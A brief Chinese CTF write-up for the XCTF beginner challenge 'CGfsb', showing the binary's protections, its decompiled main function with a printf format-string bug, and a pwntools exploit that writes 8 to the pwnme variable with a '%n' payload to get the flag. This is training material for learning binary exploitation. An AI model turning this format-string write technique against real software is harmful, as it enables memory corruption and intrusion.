『攻防世界』:新手區 | CGfsb
阿新 • • 發佈:2020-08-04
checksec:
Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
IDA:main 利用程式中的 printf(&s)修改pwnme的值為8即可獲取到flag
int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] intv5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp+26h] [ebp-76h] char s; // [esp+28h] [ebp-74h] unsigned int v8; // [esp+8Ch] [ebp-10h] v8 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); buf = 0; v5 = 0; v6 = 0; memset(&s, 0, 0x64u); puts("please tell me your name:"); read(0, &buf, 0xAu); puts("leave your message please:"); fgets(&s, 100, stdin); printf("hello %s", &buf); puts("your message is:"); printf(&s); if ( pwnme == 8 ) { puts("you pwned me, here is your flag:\n"); system("cat flag"); } else { puts("Thank you!"); } return 0; }
exp:
from pwn import * io = remote('',) payload = p32(0x0804A068) + 'aaaa' + '%10$n' #804a068是pwnme的地址, io.sendlineafter('name:','aaa') io.sendlineafter('please:',payload) io.interactive()
注:
%n:將%n之前printf已經列印的字元個數賦值給偏移處指標所指向的地址位置